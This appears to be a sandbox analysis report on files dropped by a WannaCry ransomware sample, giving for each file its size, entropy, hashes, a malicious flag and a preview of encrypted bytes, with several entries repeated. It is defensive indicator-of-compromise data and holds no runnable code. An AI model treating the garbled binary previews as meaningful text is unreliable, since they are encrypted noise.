                                                                                      Preview:WANACRY!........o.h.-Yt.Y.[.M....>....s.;......c(.........[...H7...5H.f..s.2.s........`.jd...(..y.Zp.I......K.d.S.!.n.._ne........... ...P.]16......a..[...}.....7_.I..k....z.?b...J......!L7./......&..G.....q.g....[...:....J...k~...P...+.N...X.......................hY........f.L.%.zb0r..9<..r.......%......vF...u.VTjn...>...N8..M...*w...N.."K%.K3.....h......[.a........ZZ..T..'.8..3.2..[.3d#R"N..n.wg..U\&..#.zQ7j.j.).`..r6. .......G..:.!..=...\2c..._...;..a....!..1.4...57Y..q_...ov..~....F..e.F......|..D..... .,...]N.F...I.y .nz...&...>".%2Hh..LK"i7.:.^.J.Zo=....l.J...'......2..<.8..r.U7h...7...K.8.8....c^.........Y..D........J6f>.r...nY..n.....'n..-C...-}.....L.!.`..$Pj..bA.d0....<}a....;g.(.-U49{9...&....<]!..T,..aAO...4..I>..dT...E...D...u..g)Xc!..lX.;.w@..f.|QZ.,#w..T.F.d....m..W...v.../.Km..E....G.i....... h.R...ZA......VRhs..SA.U.2.`........(W...(2X.^~..*....S..d.4..wvD..R.. .GF.Q.....Q.x!..F..>..N.........i......[.|...sU.A...._6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):696888
                                                                                      Entropy (8bit):7.999751863770512
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:o8JAxzoDu2p2wU/g2Qgsic+pT0KMTluneaCKBbsqieyJOun0my6VAOc1M/rJLaux:oW4+HowU/+KMTlun1s1eSpy6anQ5AuRh
                                                                                      MD5:27EA674A2F42622D70896A667919E20C
                                                                                      SHA1:7906291F0E6617816E98B2D37D27C18B34C46C1F
                                                                                      SHA-256:D3772A5EE17DE852128030D4E0714780403F06892A77ADA558C072D42F8688E9
                                                                                      SHA-512:CE62E5FD27450B076395396A6498CDBEDF3904C7C53B1BA2E531569323429D60B5B499BB052D70D4BD8951EC3924998535914BFC261F85296F4D2F681F46D44A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........o.h.-Yt.Y.[.M....>....s.;......c(.........[...H7...5H.f..s.2.s........`.jd...(..y.Zp.I......K.d.S.!.n.._ne........... ...P.]16......a..[...}.....7_.I..k....z.?b...J......!L7./......&..G.....q.g....[...:....J...k~...P...+.N...X.......................hY........f.L.%.zb0r..9<..r.......%......vF...u.VTjn...>...N8..M...*w...N.."K%.K3.....h......[.a........ZZ..T..'.8..3.2..[.3d#R"N..n.wg..U\&..#.zQ7j.j.).`..r6. .......G..:.!..=...\2c..._...;..a....!..1.4...57Y..q_...ov..~....F..e.F......|..D..... .,...]N.F...I.y .nz...&...>".%2Hh..LK"i7.:.^.J.Zo=....l.J...'......2..<.8..r.U7h...7...K.8.8....c^.........Y..D........J6f>.r...nY..n.....'n..-C...-}.....L.!.`..$Pj..bA.d0....<}a....;g.(.-U49{9...&....<]!..T,..aAO...4..I>..dT...E...D...u..g)Xc!..lX.;.w@..f.|QZ.,#w..T.F.d....m..W...v.../.Km..E....G.i....... h.R...ZA......VRhs..SA.U.2.`........(W...(2X.^~..*....S..d.4..wvD..R.. .GF.Q.....Q.x!..F..>..N.........i......[.|...sU.A...._6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1544
                                                                                      Entropy (8bit):7.861702900835724
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkQ5i4urdVkUjBGvN4jiJDn1Ml9KKpk1bhMF/:o0EznGFJAVpk1FMx
                                                                                      MD5:A5B2BDC15739AA9A278DA66E357C7872
                                                                                      SHA1:41AF544F93049DA2932D1DA47451D6C7E38AC5BB
                                                                                      SHA-256:8C051903CBA3F9208FA9325B6577C2A3D83DF1BA4F2A1B146AB594C03E7F35CE
                                                                                      SHA-512:B37E678C7581A8ED9C283D6DF58597D5783D5C5FF98C5066BB4984138F74552905574CA7290AAAC5170B3E284B7DAC9B44EC68F15A5C51E6790142D708338549
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....M+.M.@.....9..^6...:H.Ku0.>.....?..x..g..Skk..j...A.4.q>....C:...~.v.XhM&@....-...@.."F6V..+x.l..wP8...e....L....o.C...[f'.8..4.`....K...,J.a..d.c7....,+.d&..In4.....3.H..IY3.e#.k.....Od.6.-jm,=...BG.....J.|.2...`.b....^.F......Vs.R.d.|..............]A.M.....Ma...*.W2./.p&.J78TS<x.....Wj.9....h.G.A.z....c........3.E.S...SUC.`....t.....*q.#_..x....Y.`...$...9..b....n.'...=..L\....N...`#2..E.1..t..*.Z.V8..A.I.......2.......1..\sPV..C..%...!6....Q..........~...0.D....uTjx1.e.i.a.Qb..m..u......?..X!..J...).b.O...\.T/....'Ie.`,.l..iev.f....~KxJ......I5..Z.q.S...d.T.!V$....(...q........MU...r.../..p.~E@.5.w:..eS...30.L..V...2..3.F.G.. .,.r.e...F s.....S..36h...!..ji.6WU.#...}..3.!..N...G..E..k......T\...k.w.s.D.+".........?.5...U*...C....X...N.e}.7.T{...+.....x..X<......-........LF.j...$.2).^....Y%..(U\(.&..I.~O.|8..M.. .5...e@..@J.k..J$:...k.2....H.....u.]..v.l5.sTP.O....u.3>.Z..(>tj........p..............A)..D.`.G.b.........{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1544
                                                                                      Entropy (8bit):7.861702900835724
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkQ5i4urdVkUjBGvN4jiJDn1Ml9KKpk1bhMF/:o0EznGFJAVpk1FMx
                                                                                      MD5:A5B2BDC15739AA9A278DA66E357C7872
                                                                                      SHA1:41AF544F93049DA2932D1DA47451D6C7E38AC5BB
                                                                                      SHA-256:8C051903CBA3F9208FA9325B6577C2A3D83DF1BA4F2A1B146AB594C03E7F35CE
                                                                                      SHA-512:B37E678C7581A8ED9C283D6DF58597D5783D5C5FF98C5066BB4984138F74552905574CA7290AAAC5170B3E284B7DAC9B44EC68F15A5C51E6790142D708338549
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....M+.M.@.....9..^6...:H.Ku0.>.....?..x..g..Skk..j...A.4.q>....C:...~.v.XhM&@....-...@.."F6V..+x.l..wP8...e....L....o.C...[f'.8..4.`....K...,J.a..d.c7....,+.d&..In4.....3.H..IY3.e#.k.....Od.6.-jm,=...BG.....J.|.2...`.b....^.F......Vs.R.d.|..............]A.M.....Ma...*.W2./.p&.J78TS<x.....Wj.9....h.G.A.z....c........3.E.S...SUC.`....t.....*q.#_..x....Y.`...$...9..b....n.'...=..L\....N...`#2..E.1..t..*.Z.V8..A.I.......2.......1..\sPV..C..%...!6....Q..........~...0.D....uTjx1.e.i.a.Qb..m..u......?..X!..J...).b.O...\.T/....'Ie.`,.l..iev.f....~KxJ......I5..Z.q.S...d.T.!V$....(...q........MU...r.../..p.~E@.5.w:..eS...30.L..V...2..3.F.G.. .,.r.e...F s.....S..36h...!..ji.6WU.#...}..3.!..N...G..E..k......T\...k.w.s.D.+".........?.5...U*...C....X...N.e}.7.T{...+.....x..X<......-........LF.j...$.2).^....Y%..(U\(.&..I.~O.|8..M.. .5...e@..@J.k..J$:...k.2....H.....u.]..v.l5.sTP.O....u.3>.Z..(>tj........p..............A)..D.`.G.b.........{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):103448
                                                                                      Entropy (8bit):7.9981974343531785
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:iN2lCsxkxP/qvAdIPDyN5MZCdjyx2P1S5kh1GgW6JzBGrF01+27ti0aVueLHZXOh:iN272EoUCeQQkh2EzBVX7M11XOh
                                                                                      MD5:6F0891B78FE83D356109040655DDCF2C
                                                                                      SHA1:3827E5EB136398AD0A046197E919912B5DE9C982
                                                                                      SHA-256:B3AC93CFF23E39B38888CC54D92E52B9711AFB099040EFEFB5047D810F25FC7F
                                                                                      SHA-512:12C5BBE94110799DC1F18236C114D96CA1096D02B31B89818DCE5FF53195B5B149014B82181005858CDD38D705141B89A3A9B924DC1BB5EF4EF5FB2007BBFA5B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....a....D.J.%....3.F../V...Tm4...b.q..r.17....w.i.h.@.%.^.O.l.JF%F8P_...................C.P.kM!.:.u..0..........7...(H.._qH...S........0d)1.....=.`.W.v.A..V<. .Mp"....q...a2...4.].W..{\...S...sq...M..U(e..4.0........}MB.+..y9.-c$v)...f......%U..q.....4f............x.Vb....D.._....3.......^.v.oT...p.9..>j..*....?Ds..TE...7~:.w w.V.... @Qc..w.Z..X..P..W.....D.....T...,[.y..S.D.......T........9./.Drh.$...r...h..Z...h..nW..]9...qN.<...._.._W9.:.U<.I...O..X..|1...*.-)A......-..y.y.q:..;...sP..T..../.7C.........3...Aq..}.,m)....h.WQ.q..2...1A.F...i@...Gw..R..DF.....X.mgh....{*.h.I(.....~..$......}.1.6..L..;^..[DaS.._[CyBs...\(.(..BmV..v|>..*...U..O....rg..z..f....Qh.G~q....\..#....m..*....&.....<..u..$48..z...`.O...$'..z4......l......t.F.... ..M+."...M..?AZm.}...2.i.t..m...t........J.....li.'\Rv......z...W.!..k....iLYQ .....S]s*...:..A..El..:.}....>.b.-g...e+@3h.s/;.W.a.=......tC.it$.M.xz..... .0...........F.jK...*..j.N...S.C...W...Y.r..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):103448
                                                                                      Entropy (8bit):7.9981974343531785
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:iN2lCsxkxP/qvAdIPDyN5MZCdjyx2P1S5kh1GgW6JzBGrF01+27ti0aVueLHZXOh:iN272EoUCeQQkh2EzBVX7M11XOh
                                                                                      MD5:6F0891B78FE83D356109040655DDCF2C
                                                                                      SHA1:3827E5EB136398AD0A046197E919912B5DE9C982
                                                                                      SHA-256:B3AC93CFF23E39B38888CC54D92E52B9711AFB099040EFEFB5047D810F25FC7F
                                                                                      SHA-512:12C5BBE94110799DC1F18236C114D96CA1096D02B31B89818DCE5FF53195B5B149014B82181005858CDD38D705141B89A3A9B924DC1BB5EF4EF5FB2007BBFA5B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....a....D.J.%....3.F../V...Tm4...b.q..r.17....w.i.h.@.%.^.O.l.JF%F8P_...................C.P.kM!.:.u..0..........7...(H.._qH...S........0d)1.....=.`.W.v.A..V<. .Mp"....q...a2...4.].W..{\...S...sq...M..U(e..4.0........}MB.+..y9.-c$v)...f......%U..q.....4f............x.Vb....D.._....3.......^.v.oT...p.9..>j..*....?Ds..TE...7~:.w w.V.... @Qc..w.Z..X..P..W.....D.....T...,[.y..S.D.......T........9./.Drh.$...r...h..Z...h..nW..]9...qN.<...._.._W9.:.U<.I...O..X..|1...*.-)A......-..y.y.q:..;...sP..T..../.7C.........3...Aq..}.,m)....h.WQ.q..2...1A.F...i@...Gw..R..DF.....X.mgh....{*.h.I(.....~..$......}.1.6..L..;^..[DaS.._[CyBs...\(.(..BmV..v|>..*...U..O....rg..z..f....Qh.G~q....\..#....m..*....&.....<..u..$48..z...`.O...$'..z4......l......t.F.... ..M+."...M..?AZm.}...2.i.t..m...t........J.....li.'\Rv......z...W.!..k....iLYQ .....S]s*...:..A..El..:.}....>.b.-g...e+@3h.s/;.W.a.=......tC.it$.M.xz..... .0...........F.jK...*..j.N...S.C...W...Y.r..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):112328
                                                                                      Entropy (8bit):7.998409718642953
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:ovvvTjT9BnMPMKbRXGCDSREDMrWDBngmFWXPZLc:wHTznMPr9Gzy4rWDBgzPZLc
                                                                                      MD5:6BF24A6F6489CC6F59C9C767F8F10296
                                                                                      SHA1:0512177B93F4D2556471A4B3DA8247CC23E2B61F
                                                                                      SHA-256:DB35B34F3D17FBB9FA76EF39F194A07008DEF5E3C72C470B1C0C7A0416EA79F2
                                                                                      SHA-512:E6450111075B9294F2C6AB92193E54A711FCF035BAB0742C731C93CEC331F0CD2848FC8DFB12C9C02C7575DC48BBA91FA0B8556A85844A1233575C79B151C7FD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....K...N....W..RC...n.....6.&.;.c~....C.F.....k.S._.. ..L.!.t*.....1.u...........5v4..d..mc....2:6~...$."2..M.. h....u=.X_3.A....p.....wf...a..&C{B.L..."_..,./..G.X.N..m#...(..3.....n..-..B..@...{..........;.B8..."x....f.....Q..xez...&..8..oK.)..>.............B...4..A..ex$\..K.......j....+.:'&..,....@:#.P...lW#.sxZF..O.V.u...Nd...h.%.b....<.k...].U...9.3..e.)O."......._._.Ne.Ts....a..:.b."..]..{.a..H1!..pO..O_..y..0.V5..$.....b+....g....oMW4(^(...E...!#..pMnN...p9v.o........H4.3wV.U......`.I..A.mR1:3..LO.u..U.w..u.../...I+.[E..Y...`N.^.l....Z}........#.._?..H.p..Qkfc.5C.}..GB.......%...u.R.4..)h.h.$.83a...H...t.c'i.mp.5.2.6.......]...P..12.q.&.MQ.C.........3;a.."..(..3.t#..[j........A<.yn.q}.......KkY....0.=Yd....7Iu.qv..S..C0z8].nn|4..z.][....WI...f....)/.0.7O...J:p..l...G...`.3,n.$.S=0..t.....W{.]z]H.I.b..KU../..i5..nD....d..c...91.....'.9j1.w....I`$^..C..j]a......z... .......DP.s.....aQ..!...d.W..5.-h.,..,.....#-..@0M.6.wVUk.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):112328
                                                                                      Entropy (8bit):7.998409718642953
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:ovvvTjT9BnMPMKbRXGCDSREDMrWDBngmFWXPZLc:wHTznMPr9Gzy4rWDBgzPZLc
                                                                                      MD5:6BF24A6F6489CC6F59C9C767F8F10296
                                                                                      SHA1:0512177B93F4D2556471A4B3DA8247CC23E2B61F
                                                                                      SHA-256:DB35B34F3D17FBB9FA76EF39F194A07008DEF5E3C72C470B1C0C7A0416EA79F2
                                                                                      SHA-512:E6450111075B9294F2C6AB92193E54A711FCF035BAB0742C731C93CEC331F0CD2848FC8DFB12C9C02C7575DC48BBA91FA0B8556A85844A1233575C79B151C7FD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....K...N....W..RC...n.....6.&.;.c~....C.F.....k.S._.. ..L.!.t*.....1.u...........5v4..d..mc....2:6~...$."2..M.. h....u=.X_3.A....p.....wf...a..&C{B.L..."_..,./..G.X.N..m#...(..3.....n..-..B..@...{..........;.B8..."x....f.....Q..xez...&..8..oK.)..>.............B...4..A..ex$\..K.......j....+.:'&..,....@:#.P...lW#.sxZF..O.V.u...Nd...h.%.b....<.k...].U...9.3..e.)O."......._._.Ne.Ts....a..:.b."..]..{.a..H1!..pO..O_..y..0.V5..$.....b+....g....oMW4(^(...E...!#..pMnN...p9v.o........H4.3wV.U......`.I..A.mR1:3..LO.u..U.w..u.../...I+.[E..Y...`N.^.l....Z}........#.._?..H.p..Qkfc.5C.}..GB.......%...u.R.4..)h.h.$.83a...H...t.c'i.mp.5.2.6.......]...P..12.q.&.MQ.C.........3;a.."..(..3.t#..[j........A<.yn.q}.......KkY....0.=Yd....7Iu.qv..S..C0z8].nn|4..z.][....WI...f....)/.0.7O...J:p..l...G...`.3,n.$.S=0..t.....W{.]z]H.I.b..KU../..i5..nD....d..c...91.....'.9j1.w....I`$^..C..j]a......z... .......DP.s.....aQ..!...d.W..5.-h.,..,.....#-..@0M.6.wVUk.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804458777090648
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:y3mh59kFAKIS97gZZSqOmHH3xE8oyQeC5hP4ddJuAbe8:yvFHVm6mHLoDZhP4ddJe8
                                                                                      MD5:929F16F6B837FFDC60247AED71E11C0A
                                                                                      SHA1:E4B9F4A324AB5DBD45FD8D58D867FF289206324C
                                                                                      SHA-256:2370E3AAD437B3953CB529182A82DE4D404676A4734646370028AAAF3980BF87
                                                                                      SHA-512:62652D05A3E80E1625E6A7C360021B10FFAB41F2796180AB874078AE8F21F5ECBFDF530FC653309773F3ECFA2A350A2F21CA1F2AAB0D9B5EC8DFAAD9E58C9321
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..}B..Xd.......v$.F...qi..W.&..>Q#q.n._{..SX.Yp]..q........;R..}.!....n.2..................d.*...t.\T..x.......&.A....|.IWm......3...G.2.....:.d...(...G.1dr0......H...........k..o....j..e...vRU.....1..:....(.G_c.....P......<.+.oxZ..m.L:..{..D....4..bR.<.U..p.R;.V(Sh>O<.SzZ.e.../0......<.GS...`..l^0[. .7...`M$.?W.Y..".Q...7.7..Z}@..M31Z..`..S%|..._H...m..4r.N_..*.....xr.?z......E.I~.$.R.IV2.5....=5.........i....y.SJ.#.....EJm.$........`.t.#..I.O...\...4.......r...kX...........U0..{..5..@.....1z....nD.Z.D....9-.......,.....W...,t.Ld.K..4..4^b.....J.............ksih..3......x...>.$..............U.F).$c...5.S?.-....D.....d9....V$ma..9.......Io.e.".c...J..7#.e.|Pj.RBf.8k.....7.r(.i..q........V6,.O'.*.k.<*e.../.;Rjzx.\,.......0.....;....#!.l....1.=.-...go.L...h....z..V....*p...Z.B'..m8.......t.^..g.....r(..C7_d@w.G.R..d\5.....2..C2.|......;...a.?..Q-....%.].H.jz..@x=../E..z.q..qymw1. ..p.........S.....W.5.M..}}.!...r.hu.A,l..Hok.^B....6I.'<]..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.826403123885935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:vTaV7/fADIhZBQ0NQxWLeVMhbiWsHDlIPdvY7Ut:AxNQ0NQ06QiWswYAt
                                                                                      MD5:76E863F4BB5D6D5BF41C1CB87896979F
                                                                                      SHA1:AD991D31BD43389FD421A6768D56FA7C61C62813
                                                                                      SHA-256:C377151D69C6280446DD40212C0183314521BE754DB7C3A6A5592D7849C3FD21
                                                                                      SHA-512:01C095B37C5660AB6ED4ED0A86C949C97C28CADCE3386BA5DE14522E14EBD799F052B693704C2DA7B0DE98CE81762A248096594E01D61F3F5E11FD4E68B18874
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:#..........r....8...s;l.c>p5].Szmt.J>....05...\...H..a....ED.?R....Y..H.5a.T.&..a...d..<...%......(.y..5.../,/.qp....R...gA....P..@...lv,u....M....Ni......n....d1........n...7/..\f.`.Wq{..4..1S.3X..p.v.^..j......~j....L;].4.oW.....h<...BG.........O.U.r.d!.c.6S..J....[Bx&...g..9`..&...(...%...`ii...UH...M...S.....*../m..t.:3......x..&.......v._Nw...Uy.....,...o....p.t.... .M.....f...?....x....d......RP{)]E~..B...my....n.....c....T..>..>............Q*.2.[.]..z...7.;.......9.._s'.x..uO...9..W.LQ......>~.s...b...n.h)..h..<n+.%b^.7...{..kA.&.:..LeS.'o7U.....S...BC...HI..k6.C."18......w.Z.M._2C7........V"'...`......-.......M.l....6y+.......M...cc...9|.f.|=I...F......V.z..t>F.z+u:.....H.4Lm....*..!...2MHe%..C....?....>....A+Xp..=U.....|S...%.P@>.bK..=H}q...[[R..g.gv*.9{&...`.O.....k.....[..X...TEx.... ..J....J.m........uJE.....d.:.b..WC.....u..;....2..yVZ.K....KC.f....o..v......7"..O..@z.]..;.].uP.$.#_Pr./.....).V..t.>}_..I..f..(.l....@.?.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.824762449472419
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:sLgXv/A0CjC8xJZjcLCYW5ReblwSR+garxQ4ptZkN:NnYC8jjcuoREVBpte
                                                                                      MD5:4700F8B5C45489DAD717160B9F335A26
                                                                                      SHA1:3FF83E76096FFB4238B06184D93320C35B53EC05
                                                                                      SHA-256:443C4C35CDC89EBCCF2F7FFCB80A21A1D02EB2B368FEFB809DEFDDCF5AB46FCE
                                                                                      SHA-512:BAE0B7EED53196BE30D7C46CA55FE3519D9CF7A7707DE4B45642B24FE9076BF9C44EEF2F4D8C32DFFF2C7C5C5A677F76A264D5FCF75F57BE47919C4541AD79FF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.d...e.Q.m..X.....[~....(.#......W.@..>{t!.r.. 6.U.d.FgM...0m..]*.P....... &y...O|_....:..d9t.z.).....W..a.S.5.^.e ....L.T...%....=)...~A..W....+9. .#.a.=..* .V.l6..g..2.>.xl..F..M..o..=R.......Pe.b..;..........I...5..'%.98.U.?..'r-{..t6y..a.h...;/.V..y.=...Ir.,"!......VR......C.8.I..c.C./....J)s'.2X.....p...4..%mz.U........B.....VR^..Oo..@?.p...7/...F...Q.{.../(.._.'].[.Ld.....GN.&eXc..}...#.].@.j.qRX...<...EJ....W%L./0a.9.*.X.!.:.a.....v4i8.,.....3GGnp[...A$Ds.g-...gI..[4.V.'Z.?D....9.FB.).KSR....\]..g.#...7..U.mZ\L....q.T?..77).[u....s@).F.p..vU.?.a...)D9I..^H?g...8..MG....e...+...xwt.b.{x.......u.ae`.5.B.?...16...#.|._..*.1\........W..{....I............6y........kT...2...;T.<.}m...#....^..a.I=.0..f.......ZW=$...K9SS...*.e3.t......p.}R....j...Y.,CT......Q...g..r.1s.n....Ex.H.M..#.-F.HB...%.m-7bK.u...)D.Hcn.5.C.........k.>lA...?$b..-=Fh.~*p.i-....)..).h....> L!..^...t.../37$4~[v^.c..A0.....@..(......j..Z..............Kb.........M.>."
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.823403003824815
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/nqUGXPf88wf0Q0imIH4khbZmUOajpYD6zlX:/nW3887Q0gYAs69E6zlX
                                                                                      MD5:F309203A98C6D31AB4BA6DC035248457
                                                                                      SHA1:B337FA223981E51275A302B8BA97C3F17C8D8583
                                                                                      SHA-256:9ECB69DD6C34AEA6927DACD14369F90CB9327D2838870AA7ECDADC98280E6D63
                                                                                      SHA-512:48DE82F5A5A4249CF85A2F2AC74A70A888BC8399DCB477DE7E6D79CF8C1B2EA80ECE398D693E8E57A68E9A7263CBDAC60D1F6D356E8F427E25396D58C1274C5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....G78..n.......d.6..*...K..[.r!t........}.y..........;e..`.GJm..AA>z..y.$a.p...x4.m..%...v...3.."O.=.~"...:_n.....Qb*..).H..%.....a...IX#S.....)V....YT..)....{..A.*.......3.b,.<{......^.&..,q.ke.MO.....s.....g....}.....n..J....T....a^(..w.R.<j........1....<..&......a.}....u....V.N...Z'...Vh..&....Ysy.#. .|f...6...4G...q.K.....Y....c..a..........0...%.....]..8.0...E.<...;U..;..<...MRnQ....)6...C'....@?.Y.n$|..'.../.?s...>$..~B&..ScE...YH..e.[.bw&.dP_%...9..=a............i....p.4....Qw".qb.s.....:Wt.}..c.m...q'...t'j...(..I.}. ...e.J....h....\p...c...1..7..tX#.Wu.*.%+.z......&.....!...j=.0.......x..u.../Jh;..!13.k.4<@..Fo..()......B.X..U.2...]`.&4..0.k..H..6Us.......@..t<../......y........>).g\.V9C....iM...Ejq...:.O.pBr...0._......@.k..H........m....N{..JUA....._.w#./.?...d].|......^..)/:...Q..g.\......^.0W.VC.H..wy.uX...4...>.>B+..).V.'!.A...a*..1..A..I..Y.. w...Z.;.a..l....[.0z$...N.F...\.|".~. t..T.2 ....w...l....\..'..%.S..HT...P?.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.849204193187309
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:tKOiprxcTbn2lnAFvG4NCRE4m/+VJxrbxlQuWkx:Ni7cTL2nAFu4NCS/+x/xf9
                                                                                      MD5:0ED515A9EEC38FB9AEEEBBC0B7EF4972
                                                                                      SHA1:9D07AB1A743F81E640585F284C35E6E69A74F26E
                                                                                      SHA-256:F21649B6B506C47C3ED589CE7FDC0E66CE52C2B72C6567D5CBF6ECF36FCC37D8
                                                                                      SHA-512:9FFB8426A100D23D35352C01EF135CA83BFC7807D3D6AC9A75FDD080341937A9DC8E78C258073DB1BEE9926F8E534540B3B6215537734C17AD22661FD824100E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...#....}..m..+&SF-c..3T.kOpdR.w..%..:.t"{..}...y`.Y_k0Pf...Cu....l:.CT......*..)wT....s..Q.c.g.s.f.t......6M...*]}d3).9.`.Jpz..W..G.........v....A..l.I}.Rd......!16....j.*e..k*n.....0a.W..;.S..~?U.A9:.[..c[....ai...$@d.u~.6.D.P....._....G....?..+.o.....6..L6...y.v..!....`4..K...+.*..3.....=u..y9 ..IYTs..|..z.F......o...D....}........z.P....}dx..h_[2| .@_..(..>e.=....R.\...OP.x..\T...E..O/.^.i..+.bB8hs1...?.U..v..I>C...^D..Xt.....*P..U..7.7.z..e.]._A/1.f1..n.)..pk-.t..TA..b..T..\-....`..@......E.6..'r..........e.K...z.Yz.5.H.0..D..oN..vNq9.`..]r..Oha....Z.n.IG....2N....Q..tX..........l}.......p...5...4...*$J.zQ...`g.tJ.\..?.<?.K.f.....u...#Ek..U(h2xB.......F.......).Cp.u.#X .A.\rh....&....R.Hf..A~..B13.~0...oo......r...X...t,...o.._'.a.eF.h.$f.E..i....Y.......{y.cGrY.E..../..>.].w.WGk.EZ.vb.1ic.@...Ii5.x...............zA`H..m..CUWl..g.u.....Y7^.o../....I.....h.....X?....7.{g1.X+...Pt.>...{.=`P.Z...79".w..Kn..N.lJj..E3.8.nq..\...IE.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.776571950062159
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:s7PDXTmCAQYbYJZ0KxSF/ggkfePvcj6pFdCwtTc9Mpeq5/vU:snDVAQYbYTSFGecj6p/ZeuemM
                                                                                      MD5:DF7500BA47BA8EC35A92EE921F7EADE5
                                                                                      SHA1:0A6823652E15F97A1E1AB50214AAAF5D00253BE6
                                                                                      SHA-256:A7F23FD0815134FCCBF4B172506F2A62E7B93F83D0DE1EDBC59D1EB932616332
                                                                                      SHA-512:803CF58422A3FF78C37352222F268AD62290543DCFD7FBF10C9727462BE77E87F793361350AEA48FF17724AEA486C006BC7469EC29FCDAB7F75662F8D315DC2F
                                                                                      Malicious:false
                                                                                      Reputation:low
